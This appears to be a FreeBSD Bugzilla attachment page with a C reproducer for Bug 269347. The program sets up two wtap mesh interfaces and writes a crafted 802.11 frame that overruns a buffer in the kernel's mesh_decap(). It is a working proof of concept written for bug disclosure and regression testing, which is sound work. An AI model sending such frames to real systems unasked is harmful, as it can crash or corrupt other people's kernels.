FreeBSD Bugzilla – Attachment 239928 Details for
Bug 269347
802.11 mesh peer can overrun b[] in mesh_decap()
generate an 802.11 mesh packet that causes an overrun of b[] in mesh_decap()
wtap18a.c (text/plain), 1.90 KB, created by
Robert Morris
on 2023-02-05 19:59:18 UTC
Description:
generate an 802.11 mesh packet that causes an overrun of b[] in mesh_decap()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-02-05 19:59:18 UTC
Size:
1.90 KB
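/*
 * wtap18a.c -- reproducer attached to FreeBSD Bug 269347,
 * "802.11 mesh peer can overrun b[] in mesh_decap()".
 *
 * What the program does, in order:
 *   1. Loads the wtap kernel module and (re)creates two wtap-backed
 *      interfaces, wlan0 and wlan1, both in mesh mode with mesh id "x".
 *   2. Uses /vis_map to make the two wtap devices visible to each other.
 *   3. Opens /dev/wlan0 write-only and writes a single 256-byte frame
 *      built from the XOR table below.
 *
 * Side effects on the machine it runs on:
 *   - any existing wlan0 / wlan1 is brought down and destroyed;
 *   - 1.1.1.1/24 and 1.1.1.2/24 are assigned to the new interfaces;
 *   - core dumps are disabled for this process and the commands it spawns.
 *
 * Requirements visible in the code: the wtap and vis_map tools installed as
 * /wtap and /vis_map (wtap source: /usr/src/tools/tools/wtap/wtap/wtap.c),
 * and enough privilege to load modules and configure interfaces
 * (presumably root -- confirm on the target system).
 *
 * NOTE(review): per the bug title the overrun happens in the kernel's
 * mesh_decap() while the peer handles the frame; how it shows up (panic,
 * sanitizer report, silent corruption) depends on the kernel build and is
 * not stated on this page. The same program can serve as a regression check
 * once the fix for Bug 269347 is applied.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <string.h>
#include <fcntl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <net80211/ieee80211.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <net80211/ieee80211_ioctl.h>

/*
 * XOR mask applied, eight bytes at a time, over a buffer pre-filled with
 * 0xff. A zero entry leaves the corresponding eight bytes at 0xff, so only
 * words 0, 2 and 3 differ from all-ones before the addresses are written.
 */
unsigned long long aa[] = {
0x47ull,
0x0ull,
0x67ffull,
0xa000000000000ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
0x0ull, 0x0ull, 0x0ull, 0x0ull,
};
/* Index of the next unused entry of aa[]. */
int aai;

int
main(void)
{
	/* Disable core dumps for this process and everything it spawns. */
	struct rlimit r;
	r.rlim_cur = r.rlim_max = 0;
	setrlimit(RLIMIT_CORE, &r);

	/*
	 * Environment setup. Every command is best-effort on purpose: the
	 * teardown steps fail harmlessly on a first run, when wlan0/wlan1 and
	 * the wtap devices do not exist yet, so return values are not checked.
	 */
	system("kldload wtap");

	system("ifconfig wlan0 down");
	system("ifconfig wlan0 destroy");
	system("/wtap d 0");

	system("ifconfig wlan1 down");
	system("ifconfig wlan1 destroy");
	system("/wtap d 1");

	// /usr/src/tools/tools/wtap/wtap/wtap.c
	system("/wtap c 0");

	system("ifconfig wlan0 create wlanmode mesh wlandev wtap0 meshid x");

	system("ifconfig wlan0 inet 1.1.1.1/24 up");

	system("/wtap c 1");
	system("ifconfig wlan1 create wlanmode mesh wlandev wtap1 meshid x");
	system("ifconfig wlan1 inet 1.1.1.2/24 up");

	/* Make wtap device 0 and device 1 visible to each other. */
	system("/vis_map o");
	system("/vis_map a 0 1");
	system("/vis_map a 1 0");

	/* Give the two interfaces time to come up before sending. */
	sleep(5);

	/* O_WRONLY replaces the bare literal 1 used originally. */
	int fd = open("/dev/wlan0", O_WRONLY);
	if (fd < 0) {
		perror("/dev/wlan0");
		exit(1);
	}

	char buf[256];
	memset(buf, 0xff, sizeof(buf));

	/*
	 * Apply the XOR mask one 8-byte word at a time. memcpy() is used
	 * instead of storing through a (long long *) cast of a char buffer,
	 * which was an aliasing/alignment hazard; the resulting bytes are the
	 * same. The extra bound on aai keeps the loop inside aa[] if the
	 * table is ever shortened.
	 */
	const size_t aa_words = sizeof(aa) / sizeof(aa[0]);
	for (size_t off = 0;
	    off + sizeof(aa[0]) <= sizeof(buf) && (size_t)aai < aa_words;
	    off += sizeof(aa[0])) {
		unsigned long long word;

		memcpy(&word, buf + off, sizeof(word));
		word ^= aa[aai++];
		memcpy(buf + off, &word, sizeof(word));
	}

	/* Only byte-array members of the header are written through wh. */
	struct ieee80211_frame *wh = (void *) buf;

	memset(wh->i_addr1, 0xff, 6); // dst

	// src
	static const unsigned char src[6] = {
		0x00, 0x98, 0x9a, 0x98, 0x96, 0x98
	};
	memcpy(wh->i_addr2, src, sizeof(src));

	if (write(fd, buf, sizeof(buf)) < 0)
		perror("write");

	/* Leave time for the frame to be processed before exiting. */
	usleep(200000);

	close(fd);
	return 0;
}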